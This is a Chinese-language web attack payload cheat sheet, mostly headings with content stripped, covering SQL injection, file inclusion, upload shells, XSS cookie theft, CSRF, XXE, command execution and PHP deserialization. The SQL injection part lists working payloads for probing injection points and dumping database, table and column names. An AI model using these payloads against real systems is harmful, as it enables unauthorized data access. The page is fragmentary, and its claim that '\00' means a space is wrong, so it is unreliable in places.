Payload 总结
SQL注入
通用
select user(),version(),database()
select group_concat(schema_name) from information_schema.schemata
select group_concat(table_name) from information_schema.tables where table_schema=database()
select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='表名'判断
// 字符型
?id=1xxx # 源码为 id='1xxx', 正常
?id=1' and '1'='1 # 源码为 id='1' and '1'='1', 有回显
?id=1' and '1'='2 # 源码为 id='1' and '1'='2', 无回显
// 数字型
?id=1xxx # 源码为 id=1xxx, 报错
?id=1 and 1=1 # 源码为 id=1 and 1=1, 有回显
?id=1 and 1=2 # 源码为 id=1 and 1=2, 无回显
// 列数
1' ORDER BY 3--+
1' GROUP BY 3--+
1' union select @,@,@--+注入
绕过
等价替换
文件包含
常见的敏感信息路径
Windows
Linux/Unix
其他
可以通过 phpinfo() 中的 session.save_path 查看 session 的存储位置,默认为 /var/lib/php/session
payload
文件上传
php写shell
绕马
改包绕过
XSS
反射型
漏洞服务器
vul-page-reflected.php
模拟演示-GET型
攻击者服务器
/xss/cookie-get.php
/xss/hook-get.js
钓鱼页面
xss-get.html
模拟演示-POST型
攻击者服务器
/xss/cookie-post.php
/xss/hook-post.js
钓鱼页面
xss-post.html
存储型
漏洞服务器
vul-page-stored.php
DOM型
漏洞服务器
vul-page-dom.php
payload
CSRF
钓鱼页面
referer绕过
钓鱼页面
/csrf/hook.js
token绕过
钓鱼页面
/csrf/hook.js
SSRF
XXE
有回显
payload
无回显
攻击者服务器
attack.dtd
getcontent.php
payload
CRE
代码执行
命令执行
反序列化
访问控制符:public/protected/private
注意:
属性数量大于真实数量时,会绕过
__wakeup方法protected 属性写成
S:6:"\00*\00age";,其中\00表示空格private 属性写成
S:13:"\00People\00money";,其中People时类名
数组:
Last updated